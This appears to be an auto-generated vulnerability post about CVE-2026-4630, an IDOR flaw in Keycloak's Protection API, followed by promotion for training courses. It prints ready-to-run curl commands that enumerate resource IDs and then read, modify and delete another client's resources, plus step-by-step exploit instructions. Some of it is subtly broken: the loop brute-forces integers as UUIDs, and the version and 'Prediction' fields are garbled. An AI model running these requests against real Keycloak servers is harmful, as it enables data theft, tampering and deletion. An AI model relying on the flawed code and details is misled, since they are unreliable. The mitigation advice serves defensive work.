Listen to this Post
CVE-2026-4630 is a medium‑severity IDOR (Insecure Direct Object Reference) vulnerability in Keycloak’s Authorization Services Protection API endpoint. The flaw allows an authenticated client to bypass authorization checks by manipulating the unique identifier (UUID) of a resource.
Under normal operation, Keycloak enforces resource ownership: a client can only access resources it owns. However, the Protection API endpoint fails to validate whether the provided resource UUID belongs to the requesting client. An attacker who knows or can guess a UUID belonging to another resource server within the same realm can directly reference that resource in a request. Because the API trusts the user‑supplied key without proper cross‑checking, the attacker’s request is processed as if it were legitimate.
The vulnerability stems from CWE‑639: Authorization Bypass Through User‑Controlled Key. The affected component is the resource management API (specifically the ResourceService). The endpoint expects a valid protection token but does not verify that the resource referenced in the request actually belongs to the client that owns the token. This oversight enables an authenticated client to issue unauthorized GET, PUT, and DELETE requests on arbitrary resources, leading to information disclosure, data tampering, or resource deletion.
The attack vector is network‑based, requires low privileges, and has high attack complexity. Successful exploitation does not require user interaction and leaves availability unaffected, but confidentiality and integrity are both compromised.
DailyCVE Form:
Platform: Red Hat Keycloak
Version: / (all)
Vulnerability: IDOR in Protection
Severity: Medium (CVSS 6.8)
Date: May 19, 2026
Prediction: June 3, 2026
What Undercode Say:
Enumerate resources via brute‑force UUID
for uuid in $(seq 1 1000); do
curl -X GET "https://keycloak.example.com/auth/realms/demo/protection/resource_set/$uuid" \
-H "Authorization: Bearer $TOKEN"
done
Exploit IDOR to fetch foreign resource
curl -X GET "https://keycloak.example.com/auth/realms/demo/protection/resource_set/94f7a1e2-3b4c-5d6e-7f8a-9b0c1d2e3f4a" \
-H "Authorization: Bearer $TOKEN_CLIENT_A"
Modify foreign resource
curl -X PUT "https://keycloak.example.com/auth/realms/demo/protection/resource_set/94f7a1e2-3b4c-5d6e-7f8a-9b0c1d2e3f4a" \
-H "Authorization: Bearer $TOKEN_CLIENT_A" \
-H "Content-Type: application/json" \
-d '{"name":"modified_resource","type":"urn:demo:resources:example"}'
Delete foreign resource
curl -X DELETE "https://keycloak.example.com/auth/realms/demo/protection/resource_set/94f7a1e2-3b4c-5d6e-7f8a-9b0c1d2e3f4a" \
-H "Authorization: Bearer $TOKEN_CLIENT_A"
Exploit:
- Realm configuration: Two clients (
clientA,clientB) with Authorization Services enabled andallowRemoteResourceManagement=true. - Obtain UUID: Create a resource under `clientB` and note its UUID.
- Acquire token: Request a `client_credentials` token for
clientA. - Craft request: Send a GET, PUT, or DELETE request to the Protection API endpoint using
clientA’s token but referencingclientB’s resource UUID. - Success: The API returns the resource data (GET), updates it (PUT), or deletes it (DELETE) without authorization.
Protection:
- Upgrade Keycloak to a version containing the upstream fix for this IDOR.
- Set `allowRemoteResourceManagement=false` unless remote management is absolutely necessary.
- Apply strict resource ownership validation on the API endpoint (i.e., ensure the resource UUID belongs to the client identified by the token).
- Monitor logs for anomalous GET/PUT/DELETE requests to resource endpoints.
Impact:
- Confidentiality: An attacker can read resources belonging to any other resource server in the same realm.
- Integrity: Unauthorized modification or deletion of resources is possible, affecting data consistency and availability of the resources themselves.
- Privilege escalation: The vulnerability effectively elevates the privileges of any authenticated client, allowing it to act as a resource owner for any resource in the realm.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
